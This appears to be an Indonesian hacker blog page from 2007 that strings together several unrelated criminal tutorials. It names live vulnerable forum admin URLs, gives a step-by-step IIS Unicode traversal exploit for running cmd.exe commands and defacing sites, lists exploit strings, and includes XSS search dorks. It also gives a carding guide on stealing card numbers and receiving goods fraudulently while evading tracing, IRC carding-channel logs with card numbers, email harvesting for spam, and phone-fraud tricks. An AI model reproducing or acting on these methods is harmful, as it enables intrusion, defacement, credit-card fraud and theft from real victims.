Jumat, 10 Agustus 2007

ASP

lebih lanjut...
ARF yang dikeluarkan oleh http://www.asp-dev.com/ bekerja pada platform Windows memiliki bug yang sangat fatal. Yaitu admin (sebenarnya admin atau pembuat template ya ?) tidak memberikan login username dan password pada bagian administrator web nya, sehingga siapa saja bisa masuk melalui http://www.target.com/forum/admin/default.asp

Sehingga semua orang bisa masuk dan melakukan editing / penghapusan / penambahan isi dari BBS -nya.

Jika anda menggunakan template tersebut dalam BBS anda, sebaiknya menambahkan login username dan password pada bagian /admin/default.asp sehingga BBS anda terhindar dari kejahilan orang lain.

Contoh yang bisa dicoba seperti berikut ini (saat penulisan ini belum dipatch) :
1. http://www.rvnair.com/bbs/admin/default.asp
2. http://www.equuspages.com/forum/forum2/admin/
3. http://www.joinweb.com/forum/admin/

Lumpuhkan Deepfreeze

Untuk Uninstall program ini atau melakukan perubahan
yang permanen pada windows, misalnya install program
baru, dibutuhkan password yang di set pada saat
install DeepFreeze.

Tanpa password ini jangan harap anda dapat merubah
setting komputer anda, jadi bisa dibayangkan jikalau
anda lupa password tersebut (mungkin yang anda lakukan
adalah memformat hardisk tersebut).

Namun jika anda mengalaminya jangan khawatir, ikuti
langkah-langkah berikut, mudah-mudahan masalah anda
dapat terselesaikan.

1. Download "XDeepFreeze" di
http://geocities.com/macancrew/xdeepfreeze.zip

2. Ekstrak ke C:\XDeepfreeze

3. Jalankan "Run_Me.exe" yang akan menghasilkan file
"mcr.bat" dan "XDeepFreeze.exe" akan terload.

4. Pada XDeepFreeze, Tekan "Stop DeepFreeze", untuk
menghentikan "frzstate.exe"

5. Pada XDeepFreeze, Tekan "Clean Registry", untuk
membersihkan registry yang dibuat deepfreeze pada saat
install.

6. Untuk masuk ke MS-Dos Mode, Jalankan "command.com"
(Sudah disertakan pada "xdeepfreeze.zip")

7. Jalankan "mcr.bat" (Berisi perintah yang akan
menghapus file "persifrz.vxd")

8. Ketik "Exit" untuk masuk ke Windows kembali.
Dan.....DeepFreeze tidak berfungsi lagi.

Silahkan install ulang DeepFreeze, ingat dan catat
baik-baik password yang anda gunakan.
Jika anda lupa lagi lakukan kembali cara diatas

Deface NT Web

Deface adalah kegiatan untuk mengganti ataupun merubah tampilan halaman depan sebuah situs. Tentu saja prosesnya dilakukan dengan memanfaatkan kelemahan dari situs tersebut, sehingga kalo loe adalah web master dan loe ngerubah tampilan halaman situs yang loe punya tentu saja
itu nggak bisa disebut deface...heheheh. Banyak yang bertanya "gimana sich nge-deface situs?" seperti yang telah gue sebutin diatas proses deface dilakukan dengan memanfaatkan lubang (hole) yang terdapat pada server tempat situs itu berada. Sehingga hal pertama yang harus kamu ketah
ui untuk melakukan proses deface adalah OS (Operating System) dari server situs tersebut. Hal ini karena karakteristik dari tiap OS yang berbeda-beda, contohnya antara IIS dengan BSD tentu saja sangat berbedaapabila kita ingin melakukan deface diantara kedua OS tsb. Operating
System atau OS biasanya kalo gue sich gue kelompikin ke 2 keluarga besar,yaitu :
1. IIS (server untuk microsoft, dkk)
2. Unix(linux,BSD,IRIX,SOLARIS,dsb)

Nah kita kelompikin jadi 2 gitu aja yah..:) sekarang saya coba jelaskan satu-satu. Dikarenakan sudah banyak tutorial yang membahas mengenai kelemahan dari IIS (baik IIS 4 maupun 5) maka disini gue cumancopy-paste tutorial yang pernah dibuat oleh salah satu "maha guru" dalam
komunitas #cracxer di DALNET, yah sapa lagi kalo bukan "pak-tani" (master..paLa loE lONjoNG..!!) heheheeh... ini dia tutorialnya :

~*~DEFACING NT WEB SERVER WITH BUG UNICODE MICROSOFT IIS~*~
-------------------------------------------------------------

Melalui tutor ini saya teh hanya ingin berbagi pengalaman mengenai cara men-deface website yang
menggunakan Microsoft Internet Information Server atau Microsoft IIS. Harap DeFaceR (sebutan bagi org yg suka deface..;p) ketahui...Microsoft Internet Information Server atau MS IIS 4.0/5.0 memiliki suatu bug yang dinamakan "unicode bug". Sayah tidak akan menjelaskan panjang lebar mengenai "unicode bug" ini karena sayah takut salah menjelaskan (ssSSTTtHHH!! jgn bilang sapa2 yah sebenernyah sayah teh emang gak tau ...ehehehheehhe..;p~). Yang jelas dengan bug ini kita bisa mengeksplorasi komputer target dengan hanya menggunakan internet browser.

OK...mari kita mulai...Pertama kita cari site site target terlebih dahulu di search engine (google,yahoo,dll)...key nya terserah kowe.....Lalu utk mengetahui site itu menggunakan
MS IIS 4.0/5.0...Kita scan terlebih dahulu di www.netcraft.com......dapat site yah..??...Okeh..
setelah kita mendapatkan site yg menggunakan MS IIS 4.0/5.0 ...Langkah selanjutnya utk mengetahui site tersebut belum di-patch bug unicode nya mari kita scan site tersebut di mirc (utk mengeteahui cara scan lewat mirc....coba koe buka http://www.jasakom.com/hacking.asp page 3 Scanning Exploit Unicode Dengan MIRC),bisa juga memakai sopwer yg bisa and DL di http://accessftp.topcities.com/.... or memakai cara manual yg lebih sering sayah gunakan ehehhehehhee...contoh:

http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\

Ada dua kemungkinan yang tampil pada browser Anda yaitu:
Kahiji : Muncul pesan ERROR ...
Kaduana : Muncul daftar file-file dari drive C pada komputer server target. Bila ini terjadi maka
www.targethost.com tadi ada kemungkinan untuk bisa kita deface...

Mari kita perhatikan URL aneh bin ajaib diatas. Akan sayah bagi URL diatas menjadi empat bagian yaitu :
• Bagian host, yaitu "http://www.targethost.com"
• Bagian exploit string, yaitu "/scripts/..%255c..%255c"
• Bagian folder, yaitu "/winnt/system32/"
• Bagian command, yaitu "cmd.exe?/c+dir+c:\"

Kita lihat pada bagian command diatas menunjukkan perintah "dir c:\" yang berarti melihat seluruh
file-file yang berada pada root drive C. Koe bisa mencoba perintah yang lain seperti "dir d:\"
atau yang lain. Ingat, Koe harus mengganti karakter spasi dengan tanda "+". Koe bahkan bisa menge
tahui konfigurasi IP address komputer tujuan dengan mengetikkan perintah "ipconfig.exe /all"

Selain itu ada beberapa kemungkinan yaitu bisa saja URL diatas masih menampilkan error pada
browser koe. Untuk itu koe ganti sajah bagian eksploit stringnyah, eksploit string yg sering
tembus adalah :
- /cgi-bin/..%255c..%255c
- /msadc/..%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af..
- /cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
- /samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
- /iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
- /_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
- /_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
- /adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
- /scripts/..%255c..%255c

Jika semua pilihan eksploit string diatas masih memunculkan pesan error pada browser koe maka
kemungkinan besar IIS pada web server sudah di-patch bug unicode nya (OR IE kowe yg lagie dodolss ...hiheiehiehiehei). Dan koe bisa memilih situs lain sebagai sasaran....(yg sabar yah nak nyari targetnyah...ehehhehehe).

Lanjuttt......udeh dapet site yg bug unicodenyah gak di patch..??....Langkah berikutnya adalah
mengetahui di folder manakah diletakkan dokumen-dokumen web seperti default.htm/html/asp,,
index.htm/html/asp,home.htm/html/asp,main.htm/html/asp,.ada juga yg pake .php/php3/shtml.
Folder ini dinamakan web root. Biasanya web root berada di C:\InetPub\wwwroot\ atau
D:\InetPub\wwwroot. Tapi terkadang web administrator menggantinya dengan yang lain. Untuk mengetahuinya koe cukup mengetikkan URL seperti di bawah ini

http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+set

URL diatas akan menampilkan daftar environment variable dari web server sasaran. Kebuka..??...
Nah tugas koe skrg adalah mencari PATH_TRANSLATED atau tulisan PATH_TRANSLATEDnyah...gak ada yahh ..??...coba deh koe ripresh lagehh...udah ketemuuu...nah skrg kita DIR deh tuh si PATH_TRANSLATED nyah.....Kita ambil contoh PATH_TRANSLATEDnyah : C:\InetPub\wwwroot....Perintahnya ng-DIR nyah :

http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\InetPub\wwwroot

Huaaaaaaa....isinyah banyak banged yahh.....mana dokumen2 web yg kita curigain itu ada 3 bijih
lagehh....hemm santeyy...oiyahh...lupa sayah...Tugas kita setelah ng-DIR PATH_TRANSLATEDnyah.....
truss kita cari dokumen web itu disitu utk kita RENAME....gemana kalo misalnyah dokumen2 web yg kita curigain itu ada 3..santeyy...coba skrg koe buka site aslinyah di laen window....
http://www.targethost.com == neh yg ini......di situ kan alias di
http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\InetPub\wwwroot
dokumen2 web nyah ada 3 macem pasti kita bingung yg mana neh yg mo di RENAME....misalnya : di

http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\InetPub\wwwroot itu ada :
Directory of C:\InetPub\wwwroot
07/20/01 03:21p 1,590 default.htm
07/20/01 03:21p 590 index.html
07/20/01 03:21p 3,453 main.html

Udah di buka kan site aslinyah...nah coba masukin salah satu dokumen web itu di site asli nyah...
contoh : http://www.targethost.com/default.htm kita liad hasilnya apa kah sama gambarnya (halaman depannya) setelah kita masukin dokumen web tadee.waww ternyata tidak sama hemm.coba masukin lageh salah satu dokumen web itu site aslinyah.mMmm..kita masukin yg main.html.waww waww..ternyata sama gambarnyahh.Nah skrg kita RENAME deh yg main.html ituu. perintahnya :

http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+ren+C:\InetPub\wwwroot\main.html+gue.html

Lihat apa yg terjadi di IE kitaa

CGI Error
The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are:
Access is denied

Yahhhh..akses dineyy.hiekksss jgn nyerah bro` kita carih lageh targetnyah okeHh !!!Dapat
targetnyah..??udah di RENAME nyah??.Hasilnya setelah di RENAME seperti di bawah ini bukan??

CGI Error
The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are :

Kalo iyahh.waaa selamat anda telah merubah or berhasil men-deface halaman depan web site
tersebut.kalo gak caya buka ajah site aslinyah pasti ERROR kann ehehhehehhee
(Jgn lupa kita simpan C:\InetPub\wwwroot\main.html *file yg kita rename tadi di notepad utk
langkah selanjutnyah*)


Sekarang koe tugasnyah meng-upload file koe ke site tadee Ada dua cara my bro` Pertama lewat ECHO..
Kedua lewat TFTP32.


*Cara pertama :*
Utk meng-upload file lewat echo sebelumnyah kita harus mengcopy file cmd.exe pada direktori
C:\winnt\system32 ke suatu folder lain atau folder yang sama dengan nama lain, misalnya cmdku.exe
. Untuk meng-copy cmd.exe menjadi cmdku.exe pada folder winnt\system32 maka cukup ketik URL
berikut :

http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+

Comersus Shoping Cart

Dengan google, cari kata kuncinya :
allinurl:comersus_message.asp
allinurl:comersus_backoffice_message.asp

setelah itu kita beri tambahan dengan croos scripting, misalnya :

http://www.target.net/comersus/store/comersus_message.asp?message=
PeNcOpEt_CiNtA


atau kita bisa mengirim email untuk admin hehehehe ini contoh lagi :

http://www.target.net/comersus/backofficelite/comersus_backoffice_

Cara Carding

Semenjak dipopulerkannya sistem kartu kredit sekitar tahun 70-an dulu,
semakin banyak orang yang menggunakan sistem pembayaran kartu kredit sebab
kartu kredit dianggap lebih praktis untuk dibawa-bawa dan lebih mudah
sebab sistem pembayarannya adalah online. Di Amerika, Kanada dan
negara-negara Eropa, kartu kredit adalah hal yang sangat lumrah digunakan,
bahkan oleh para pelajar SMA sekalipun. Di Indonesia, biar bagaimanapun,
kartu kredit masih dipandang sebagai simbol status. Dulu saya ingat di
waktu saya masih SMA di Lampung ada teman yang punya kartu kredit dan tiap
hari diporotin oleh anak-anak. Beberapa tahun belakangan, dengan makin
ramainya 'online business' di Indonesia, semakin meluaslah pemakaian kartu
kredit sebagai sistem pembayaran, terutama di kota-kota metropolitan
seperti Jakarta, Medan dan Surabaya.

Bagaimana kartu kredit bisa jatuh ke tangan orang lain.
=======================================================

Pada prinsipnya, sang kartu sendiri (plastik) sangat jarang didapatkan.
Hal ini sebab orang beranggapan, jika kartu kreditnya disimpan di lemari
dan hanya dikeluarkan pada saat ingin digunakan, maka akan sangat susah
untuk menyalah gunakan kartu tsb. Ini adalah kesalahan yang cukup besar.
Pada pokoknya, jika kamu ingin melakukan kejahatan penyalahgunaan kartu
kredit, yang diperlukan adalah *nomor* kartu tersebut, beserta nama
pemiliknya (banyak juga bisnis yang meminta tanggal kadaluwarsa, namun di
Internet, biasanya kamu bisa lolos menggunakan nomor dan nama saja,
asalkan tanggal kadaluwarsa diisi (dikarang-karang) paling tidak enam
bulan didepan).
Bagaimana caranya memperoleh nomor-nomor kartu kredit ini ??? Di
negara-negara dimana kartu kredit digunakan secara meluas, untuk
mendapatkan nomor kartu kredit, biasanya tidak memerlukan ketrampilan
khusus. Kamu bisa iseng ngaduk-ngaduk tempat sampah toko grosir atau bisa
coba kerja di pom bensin, dan mendapatkan bon kartu kredit pelanggan. Di
Indonesia, hal ini semakin mungkin dilakukan, terutama di pasar-pasar
swalayan besar seperti Sogo, segitiga Senen, M Plaza, dll. Biasanya bon
penerimaan berupa kertas berwarna yang mencantumkan nama, nomor kartu
kredit, berapa total harga, dan seterusnya. Jika kamu seorang perempuan,
itu lebih bagus lagi. Cari kerjaan sebagai kasir dan sempatkan diri untuk
menyalin nomor-nomor tersebut. Perempuan juga jarang dicurigai ;-).
Mengaduk-ngaduk tempat sampah juga bisa berguna, sebab selain bisa
mendapatkan salinan bon, jika kamu ngaduk-ngaduk tempat sampah di dekat
bangunan ISP, kamu juga bisa mendapatkan password/login, dll (lihat
artikel 'Trashing dan Social Engineering').
Metode mutakhir yang sekarang banyak digunakan di negara-negara maju
adalah dengan cara menggunakan perangkat 'surveillance' untuk mendapatkan
nomor kartu kredit calon korban. Tentu saja jika kamu berhasil
mendapatkan akses ke database milik ISP atau Web komersil, kamu bisa
memanen ratusan bahkan ribuan nomor kartu kredit dari situ.

Sudah dapat kartunya, lalu?
===========================

Umumnya, para kriminil tingkat kecil-kecilan yang berhasil mendapat nomor
kartu kredit milik orang lain menggunakannya untuk kebutuhan pribadi. Hal
ini masih agak sulit dilakukan di Indonesia sebab masih jarang bisnis
komersil yang bersedia menerima pembayaran kartu kredit tanpa mengecek
detailnya. Di Kanada sini, cara yang banyak dipraktekkan adalah sbb:

- temukan rumah kosong / yang lagi ditinggalkan penghuninya untuk jangka
waktu yang lama
- buka katalog-katalog barang-barang menarik yang diinginkan
- telepon sang penjual, bayar dengan kartu kredit tsb (perlu tgl
kadaluwarsa, dan biasanya alamat sang empunya kartu).
- minta diantarkan ke alamat rumah kosong tadi (atau, lebih bagus lagi,
kamar hotel), dan minta 'express delivery' (hari berikutnya)
karang alasan seperti: perlu mendadak untuk presentasi lusa, atau
tetek bengek lainnya. gunakan social engineering.
- tunggu kedatangan barangnya.
- ambil barangnya, dan ... CABUT!

Dengan cara ini kadang-kadang para kriminil (umumnya anak ABG) bisa
mendapatkan laptop Tilamook terbaru bernilai $5000. Sang pemilik kartu
sendiri pada saat mengetahui bahwa kartunya telah disalah gunakan tidak
akan dikenakan biaya apa-apa, selain mungkin administrasi pengurusan
kasus, yang nilainya tidak sampai $50.
Dengan makin maraknya servis internet, semakin banyak pula kriminil yang
men(yalah)gunakan kartu kredit curian untuk mendapatkan servis gratis.
Karena komputer itu bodoh, kamu bisa dengan gampangnya mengaku sebagai
pemilik yang sah. Biasanya dengan mengisi 'form' di webpage, kamu bisa
registrasi untuk layanan tsb (kalau tidak salah d-net sudah punya
fasilitas ini, melalui diffy.com-nya, tapi kurang pasti) atau bisa untuk
mengorder sesuatu. Di Indonesia, yang paling sering digunakan oleh para
kriminil jenis baru ini (yang, umumnya adalah cowok ABG) adalah, apalagi
kalau bukan, registrasi 'member' untuk klub-klub porno di Internet.

Beberapa anggapan
=================

1. Tidak mungkin saya bisa dilacak, toh, ini Internet, dan tak ada yang
melihat.
Hampir benar. Mungkin jika kamu hanya menggunakannya untuk pemalsuan
kelas teri, akan dibiarkan saja berlalu. Dalam pemalsuan kelas kakap, pun,
kamu masih bisa lolos tanpa dilacak. Tapi dengan syarat kamu benar-benar
hati-hati. Gunakan line telepon yang bukan milikmu, gunakan account
internet bukan milikmu, dari web gunakan Anonymizer, dll dll (seperti
layaknya cracking/intruding). Namun resiko kamu terlacak jelas ada, bahkan
di Indonesia sekalipun. Setiap transaksi di Internet merekam nomor IP
kamu, walaupun browser kamu tidak diset 'secure'. Anonymizer tidak
bersedia melayani protokol https:// (secure HTTP). Dial-in server yang
kamu gunakan punya catatan nomor mana yang memanggil. Dan, kalo
dipikir-pikir, jika kamu benar-benar konak, kenapa susah-susah, sih? Toh
gambar-gambar kayak gituan banyak tersedia eceran kaki lima. Menggunakan
kartu kredit milik orang ada gunanya jika misalnya kamu berhasil
mendapatkan kartu kredit milik Bambang Suharto atau sodara-sodaranya. Nah,
itu baru enak, bisa kamu porotin tuh orang-orang yang selama ini morotin
rakyat.

2. Kita bisa menggunakan kartu kredit hasil dari 'CC Generator'.
Biasanya tidak benar. Memang, banyak program-program yang beredar di
internet dan bisa menghasilkan nomor kartu kredit, namun program-program
tsb biasanya bekerja atas dasar logaritma nomor kartu kredit. Dan 'nomor
kartu kredit' hasil buatan program-program tsb adalah fiktif. Sedikit
servis di Internet yang melakukan check hanya berdasarkan algoritma ini
saja. Pada umumnya servis-servis komersial menggunakan check berdasar:
Nama Pemegang Kartu, Nomor Kartu, dan Kode Pos alamat pemegang kartu.

3. Saya sudah berhasil mendapatkan password/login untuk barely.hustler.com
(atau sejenisnya) tentunya mulai dari sekarang, saya selalu bisa
mengakses site tsb sebagai 'member'.
Tidak benar. Biasanya nomor kartu kredit hasil curian mempunyai 'umur
hidup' tertentu. Umur hidup ini bervariasi. Kadang-kadang setelah kamu
meregistrasi/mengorder barang pada malam hari, keesokan harinya sang
perusahaan korban melakukan check, dan menemukan kejanggalan (contoh:
Alamat tidak sinkron). Atau bisa juga minggu depannya. Kemungkinan lain
adalah sang pemilik kartu kredit yang asli akan menemukan kejanggalan di
'bill' (laporan rekening) kartu kreditnya. Hal ini akan membuatnya waspada
dan melaporkan kepada bank/institusi finansialnya. Segera setelah itu,
account ilegal kamu akan dimatikan (dan, jika serius masalahnya, bisa
dilakukan pelacakan). Cara yang bisa digunakan untuk memperpanjang 'umur
hidup' nomor curianmu antara lain adalah dengan cara menggunakan kartu
kredit korporasi (milik perusahaan besar), membatasi transaksi ilegal yang
dilakukan (jangan diumbar sekali pakai habisin $200), dlsb.

4. Jangan sekali-kali menggunakan kartu kredit untuk telepon SLJJ/Long
Distance.
Cukup benar. Di Amerika, perusahaan-perusahaan seperti Sprint, AT&T, dll
menerima kartu kredit sebagai ganti koin untuk layanan telepon jarak jauh,
atau bahkan kadang-kadang internasional. Walaupun kamu menggunakan telepon
umum, resiko masih ada. Mereka bisa melacak siapa yang kamu telepon. Hal
ini tentunya bukan masalah jika kamu menelepon teman kamu yang *juga*
menggunakan telepon umum, atau teman kamu yang tinggal di, ... Libya,
misalnya.

Penutup
=======

Kayaknya cukup segini dulu, deh, sebab udah mulai kepanjangan nih. Saran
saya kepada kalian yang tertarik untuk menjadi 'professional carder',
hati-hatilah selalu. Eksplorasi adalah hal yang baik, tapi pastikan
sedapat mungkin kamu tidak merugikan orang lain atau dirimu sendiri. Gitu
dulu, deh. Ciao ..

Cara Mendapatkan Puluhan Ribu Email

A. Gunakan software Mailcrawl (notworksolution.com) Versi gratisnya bisa menyimpan 3.000 email sekali pencarian, bisa diakali sampai bisa menyimpan 15.000 email/keyword.

Cara menggunakan :
1. Pada quick start wizard click using target searching kemudian masukkan keyword khas Indonesia
(keluarga, uang, wanita, sukses, pertanian, militer)
2. Option :
a. thread pilih 60-80
b. email parsing: klik only extract email with these extension/domain lalu isi .com .net .id c. pada ignore email with these username isi dengan daftar kata di bawah : (copy saja)
abuse info consult notice privacy support spam nospam sales bugtraq listserv subscribe unsubscribe
majordomo reply bounce mail nama domain daemon www news xxx 20 3d file main webadmin webmaster
admin owner promaster postmaster hostmaster manajerhosting tuanweb webhosting daftar register billing
customercare customerservice cs feedback komentar manager namaanda name username yourname
support technical service cs prohosting zzz info support technical request join berhenti
anggota menu index help file artikel d. automatic saving pilih angka 1.000 e. Start --- beri nama folder tempat penyimpanan hasil sesuai dengan nama keyword f. Jika angka email valid belum mencapai 1,000 sedangkan panel pencarian telah mendekati batas akhir,
lakukan stop kemudian tambahkan keyword baru tanpa harus mereset lagi. Sebaiknya nama folder
penyimpanan gabungan keyword
g. Jika angka email valid telah mendekati angka 3.000 sementara panel pencarian masih jauh dari batas
akhir. Lakukan stop lalu start kemudian beri nama baru folder hasil pencarian, sebaiknya keyword1,
keyword2 dst.

3. Jika telah dilakukan pengumpulan dengan banyak keyword, pasti ada email ganda.
Untuk mendapatkan daftar email tunggal gunakan software Listawy (mewsoft.com). Sofware ini selain bisa
merge, removal email juga mensplit seluruh email menurut jumlah file atau jumlah email/per file

Senjata Seorang Carder

Tentu kalian udah nggak asing lagi dengan istilah yang satu ini,carder adalah istilah yang diberikan oleh hacker sejati untuk pencuri kartu kredit. Kali ini kita akan bahas soal carder ini.

Tapi ingat!!! yang aku tulis ini,hanya bersifat ilmu pengetahuan.aku tidak bertanggung jawab jika kalian berurusan dengan pihak kepolisian. Aku sarankan jika kalian mendapat cc jangan beli barang.

Mari kita mulai......

1.masuk ke MIRC
dari MIRC kalian join ke channel ini :

#CCPOSTS
#THACC (Dulu namanya #thecc)

sebenarnya masih banyak channel yang lainnya tapi aku kasih dua aja yaa!!

2.setelah join ke #ccpost kamu ketik perintah !commands dan kemudian akan muncul di layar perintah perintah yang bisa kamu gunakan.

3.!chk cc number valid /!chk 1234567890 1202 untuk mengetahui kartu tsb bisa di gunakan atau tidak.

4.!cvv2 cc number/ !cvv2 1234567890 untuk mengetahui nomor identitas kartu tsb (card ID)

5.!proxy
untuk mengetahui nomor proxy dan port yang bisa kamu gunakan untuk mengelabui ISP.

6.!order.log
untuk mengetahui nama,alamat dan cc number seseorang.

ini nih cuplikannya :

#ccposts

*** Now talking in #ccposts

*** Topic is '..:: Welcome To #CCPOSTS | !Chk [OFF] !Commands [ON] !Cvv2 [ON] | Also Idle In #Dont.whois.me.bitch and get Aop | +o/+v Verify First| /server xdirc.d2g.com -> Free BNC: /server portatech.net 21500 xdirc'

*** Set by ^XDIrc^ on Thu May 09 02:04:28
-CCard-Chk-Bot- Tired Of Using Dallnet FFoor Checking CC's ? Try X-Niatites 5.01 -- http://mi5.ausgamers.com/xns501.exe (Win ME untested & 24 Valid CC's Included) !cvv2 5437000105070603 !commands

*** Quits: MIHUTESCU (~mihut@80.97.26.67) (Client closed connection) Er0sake` , < 5437000105070603 > is Master > cvv2 : -> 074 <-, by : SL[a]TkiS , #DaCc
-listen2rap- SL[a]TkiS's command llist iiss as following: !country Country-Name, !state State-Name, !bank cc-Number, !bnc, !order.log, !cardable, !proxy, !unicode, !cvv2 ccNumber - -=. SL[a]TkiS addon version 4.0, get it at www.sthost4u.net/Programs/slatkis_addon_4.0.zip , #DaCc =- <@^Enhance^> ?? Request ?? Info?Auth.net Merchant Account - I have Virgins / Cvv2 / eBay Seller Accounts / Proxy / XXX / Cardable Sites / High Limit CCs -- I Ver. First. NewBs & Ripperz Piss Off? ? ?׿? ?

*** Joins: ^tyty^ (BaCk0ff@max227.idx.com.au)

*** Quits: ^tyty^ (BaCk0ff@max227.idx.com.au) (Quit: )

* DaLinuX i have root i need cc msg me for trade
!chk 373216942923005 0802


#thacc
*** Now talking in #thacc
*** Topic is 'We are not responsible for any actions that non-op's perform or any actions against DALnet policy that may done at the main chan}}[Type: !commands ] ||GSD's site: www.TheCC.biz || [ Join #CCpower ] [new command by GSD > !phone < only when MR^all' is here] y2y = GSD'
*** Set by GSD on Fri May 03 02:11:11
!proxy
*** Parts: fc4 (~umik_o@203.147.50.12)
*** Joins: fc4 (~umik_o@203.147.50.12)
<^Enhance^> ?? Request ?? Info?Auth.net Merchant Account - I have Virgins / Cvv2 / eBay Seller Accounts / Proxy / XXX / Cardable Sites / High Limit CCs -- I Ver. First. NewBs & Ripperz Piss Off? ? ?׿? ?
*** Quits: ALICE22 (kozxgy@189.Red-80-34-233.pooles.rima-tde.net) (Quit: IRcap 7.1 http://www.ircap.net !)
*** Quits: ^tyty^ (BaCk0ff@max227.idx.com.au) (Quit: ) !xlogin 373216942923005 0802
*** e_KiNGHT-[Away] is now known as Guest53360
How I can see my card is valid
* DaLinuX i have root i need cc msg me for trade


Jelas ??!
Sekedar saran aja, pakai alamat rumah kontrakan/kost, jadi setelah barang yang didapat sampai, segera kabur dari rumah tersebut, hheeeehe, biar gak dilacak

LINUX

Unix yang seluruh source codenya dibuat dengan bahasa C sangat memudahkan
pengembanganya sehingga dalam waktu singkat Unix dapat berkembang secara
pesat, dan terbentuklah dua aliran : yaitu Unix yang dikembangkan oleh
Universitas Berkeley dan yang dikembangkan AT&T.

Semakin lama semakin banyak perusahaan yang ikut melibatkan diri, sehingga
terjadilah persaingan antar perusahaan untuk memegang kontrol terhadap
sistem operasi.PErsaingan ini menyebabkan perlunya sebuah standar yang baku
sehingga lahirlah proyek bernama 'POSIX' yang di motori oleh IEEE (The
Institute of Electrical and Electronics Engineers) yang akan menetapkan
spesifikasi standar Unix. ternyata, dengan adanya standar tersebut tetap
belum bisa meredakan persaingan yang timbul yang mengakibatkan munculnya
berbagai varian dari Unix.

Source code Minix yang tercipta sebagai salah satu varian Unix dan dibuat
oleh Andy S Tanembaum untuk tujuan pendidikan inilah yang dijadikan Linus
Torvalds sebagai referensi untuk membuat suatu Opeating system yang dapat
bekerja seperti Unix dalam komputer 386. Dalam pembuatan linux , Linus
memakai tool-tool dari Free Software Foundation yang berlicensi GNU. Agar
sistem operasi yang baru dibuatnya utuh , linus juga menambahkan program-
program yang berlicensi GNU. Linux yang dibuat linus sebagai hobi akhirnya
membuahkan versi pertama linux, yaitu linux versi 0.0.1, setelah mengalami
perbaikan pada versi 0.02 dan merupakan linux resmi pertama yang diumumkan
secara luas kepada publik. pada tanggal 5 Oktober 1991 linus menggumumkan
source codenya.

Linux yang pertama dirilis sudahdapat menjalankan shell bash,GNU C compiler
, GNU make, GNU Sed, Compress dll. Proyek linux ini menyita begitu banyak
perhatian seluruh programer di dunia yang akhirnya berpartisipasi untuk
ikut mengembangkan linux.

'Linux' bisa jadi merupakan proyek para hacker yang sangat berharga di
dalam sejarah - serta didistribusikan secara bebas beserta kode sumbernya
keseluruh dunia.

Cara Cepat Bongkar Password

Ada cara cepat menerobos password windows ( termasuk jaringan windows ) saat anda lupa yakni menngunakan @stake LC4 (dulunya bernama L0pht Crack).
LC4 sanggup melawan mesin windows anda dengan sebuah kombinasi dari kamus dan serangan brutal orang2 usil.LC4 bisa mengcrack hampir semua password dalam hitungan detik saja.bahkan pada password yang terdiri dari angka dan karakter2 panjang.
Seperti diketahui Password windows Nt,2000,dan juga XP disimpan menggunakan sandi (encrypt) hash marks.LC4 sanggup membongkar hash marks tersebut dengan proses kerja ratusan password per menitnya.selanjtnya,password yang tepat akan dikirim dan ditampilkan ke layar monitor
Dalam sebuah perusahaan,LC4 bisa digunakan untuk mengakses PC karyawan.ia bisa digunakan untuk mengakses komputer dari user-user yang lupa dengan password-nya.maksudnya,System Administrators jaringan bisa mencari password yang lemah dalam beberapa menit.bahkan juga,sys admins bisa merubah password tersebut agar lebih aman
Kejelekan program pembongkar password ini,seseorang yang usil bisa menggunakan LC4 ini untuk mencium (Mengawasi) password2 dari user sebuah jaringan.bahkan,seorang hacker bisa memasang aplikasi primary domain controller dan menjegal ratusan password berharga hanya dalam hitungan menit.
Info dan Download Program LC4beserta versi evaluasi ini bisa diambil http://www.atstake.com/research/lc/

Tip n Trik Telepon Gratis

I. Trik telphon gratis Lokal (dalam kota)

Fasilitas dan cara yang digunakan:
1. Telphone umum koin yang masih hidup
2. Pencet angka 1551 <--- catatan: angka 1 terakhir di pencet lama hingga ada nada "tut/nit/nada sela lainnya"
3. Bila tanda itu telah bunyi baru tekan nomor yang dituju ( nomor telphone lokal)
4. dan anda akan mendapatkan sambungan langsung dari telkom ke no telp yang dituju, maka anda bisa bicara sepuas bibir anda.

Note: Untuk nomor lokal yang tidak bisa dihubungi biasanya dikarenakan :
1. TERLALU BANYAK NOMOR YANG KEMBAR
2. TERLALU BANYAK ANGKA DOMINAN BESAR MISAL 8997896/89868789/ dll
3. DAN BILA TELEPHONE YANG DITUJU BELUM TERPASANG
4. TELKOM SEDANG KENA TROUBLE :))

II. TRIK TELEPHONE GRATIS INTERLOKAL (LUAR KOTA)

Fasilitas dan cara yang digunakan:
1. Telphone rumah, kantor atau wartel tipe B (sangat dianjurkan)
2. Telponlah seperti kita menelpon biasa ke NOMOR TUJUAN LUAR KOTA (khusus luar kota)
3. Bicaralah sepuas hati dan sebengkak bibir anda
4. Bila telah selesai percakapan ... PERHATIKAN TRIK INI:

TRIK 1. - SEBELUM ANDA MENUTUP TELEPHON, KETIKLAH NOMOR TUJUAN PERSIS SEPERTI NOMOR YANG DITUJU PERTAMA
misal: tujuan 021888555000 -> bila telah selesai ketikan 021888555000 lagi
JANGAN PAKAI TOMBOL RADIAL, KARENA SERING GAGAL

TRIK 2. - SEPERTI CARA TRIK PERTAMA TADI CUMAN KITA RUBAH NOMOR TUJUAN AKHIR
misal: tujuan 021888555000 -> bila telah selesai ketikan 031545552222 (BEDA NOMOR TUJUAN)
JANGAN PAKAI TOMBOL RADIAL, KARENA SERING GAGAL


